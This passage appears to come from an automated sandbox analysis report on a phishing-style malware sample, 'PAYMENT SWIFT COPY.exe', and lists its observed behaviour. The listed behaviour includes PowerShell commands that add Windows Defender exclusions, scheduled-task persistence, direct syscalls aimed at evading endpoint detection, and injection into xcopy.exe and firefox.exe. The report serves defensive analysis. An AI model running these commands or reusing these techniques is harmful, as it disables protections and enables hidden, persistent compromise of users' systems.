                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h]8_2_0194EB1D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h]8_2_0194EB1D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h]8_2_0194EB1D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h]8_2_0194EB1D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4B00 mov eax, dword ptr fs:[00000030h]8_2_019A4B00
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FEB20 mov eax, dword ptr fs:[00000030h]8_2_018FEB20
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FEB20 mov eax, dword ptr fs:[00000030h]8_2_018FEB20
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01998B28 mov eax, dword ptr fs:[00000030h]8_2_01998B28
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01998B28 mov eax, dword ptr fs:[00000030h]8_2_01998B28
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197EB50 mov eax, dword ptr fs:[00000030h]8_2_0197EB50
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A2B57 mov eax, dword ptr fs:[00000030h]8_2_019A2B57
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A2B57 mov eax, dword ptr fs:[00000030h]8_2_019A2B57
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A2B57 mov eax, dword ptr fs:[00000030h]8_2_019A2B57
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A2B57 mov eax, dword ptr fs:[00000030h]8_2_019A2B57
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01984B4B mov eax, dword ptr fs:[00000030h]8_2_01984B4B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01984B4B mov eax, dword ptr fs:[00000030h]8_2_01984B4B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01978B42 mov eax, dword ptr fs:[00000030h]8_2_01978B42
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01966B40 mov eax, dword ptr fs:[00000030h]8_2_01966B40
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01966B40 mov eax, dword ptr fs:[00000030h]8_2_01966B40
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199AB40 mov eax, dword ptr fs:[00000030h]8_2_0199AB40
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C8B50 mov eax, dword ptr fs:[00000030h]8_2_018C8B50
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CCB7E mov eax, dword ptr fs:[00000030h]8_2_018CCB7E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01908A90 mov edx, dword ptr fs:[00000030h]8_2_01908A90
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h]8_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h]8_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h]8_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h]8_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h]8_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h]8_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h]8_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h]8_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h]8_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4A80 mov eax, dword ptr fs:[00000030h]8_2_019A4A80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8AA0 mov eax, dword ptr fs:[00000030h]8_2_018D8AA0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8AA0 mov eax, dword ptr fs:[00000030h]8_2_018D8AA0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01926AA4 mov eax, dword ptr fs:[00000030h]8_2_01926AA4
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01904AD0 mov eax, dword ptr fs:[00000030h]8_2_01904AD0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01904AD0 mov eax, dword ptr fs:[00000030h]8_2_01904AD0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0AD0 mov eax, dword ptr fs:[00000030h]8_2_018D0AD0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01926ACC mov eax, dword ptr fs:[00000030h]8_2_01926ACC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01926ACC mov eax, dword ptr fs:[00000030h]8_2_01926ACC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01926ACC mov eax, dword ptr fs:[00000030h]8_2_01926ACC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190AAEE mov eax, dword ptr fs:[00000030h]8_2_0190AAEE
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190AAEE mov eax, dword ptr fs:[00000030h]8_2_0190AAEE
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195CA11 mov eax, dword ptr fs:[00000030h]8_2_0195CA11
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FEA2E mov eax, dword ptr fs:[00000030h]8_2_018FEA2E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190CA24 mov eax, dword ptr fs:[00000030h]8_2_0190CA24
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F4A35 mov eax, dword ptr fs:[00000030h]8_2_018F4A35
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F4A35 mov eax, dword ptr fs:[00000030h]8_2_018F4A35
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0A5B mov eax, dword ptr fs:[00000030h]8_2_018E0A5B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0A5B mov eax, dword ptr fs:[00000030h]8_2_018E0A5B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D6A50 mov eax, dword ptr fs:[00000030h]8_2_018D6A50
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D6A50 mov eax, dword ptr fs:[00000030h]8_2_018D6A50
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D6A50 mov eax, dword ptr fs:[00000030h]8_2_018D6A50
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D6A50 mov eax, dword ptr fs:[00000030h]8_2_018D6A50
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtCreateUserProcess: Direct from: 0x76F0371C
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: NULL target: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: NULL target: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe protection: execute and read and write
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\xcopy.exeThread register set: target process: 7980
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\xcopy.exeThread APC queued: target process: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: drfYhRLxnrcfFY.exe, 0000000E.00000002.4140553267.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000000.1789269157.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4140667170.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: drfYhRLxnrcfFY.exe, 0000000E.00000002.4140553267.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000000.1789269157.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4140667170.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: drfYhRLxnrcfFY.exe, 0000000E.00000002.4140553267.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000000.1789269157.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4140667170.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: drfYhRLxnrcfFY.exe, 0000000E.00000002.4140553267.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000000.1789269157.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4140667170.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
